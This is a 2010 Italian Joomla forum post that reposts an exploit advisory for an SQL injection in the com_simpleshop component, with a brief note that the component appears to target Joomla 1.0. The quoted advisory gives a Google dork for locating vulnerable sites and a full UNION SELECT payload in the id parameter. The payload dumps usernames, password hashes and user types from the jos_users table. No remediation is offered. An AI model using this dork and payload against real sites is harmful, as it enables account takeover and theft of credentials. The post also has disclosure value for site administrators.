Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 30 Jul 2010, 13:22:30

: Joomla Component (com_simpleshop) SQL Injection Vulnerability
: jeckodevelopment 30 Jul 2010, 13:22:30
Il componente sembra essere per Joomla 1.0.
Non si hanno maggiori informazioni riguardo la vulnerabilità.

:
==============================================================
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================

###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
###########################   
         
[ Vulnerable File ]
     
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]

[SQL]:

id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

##############################################################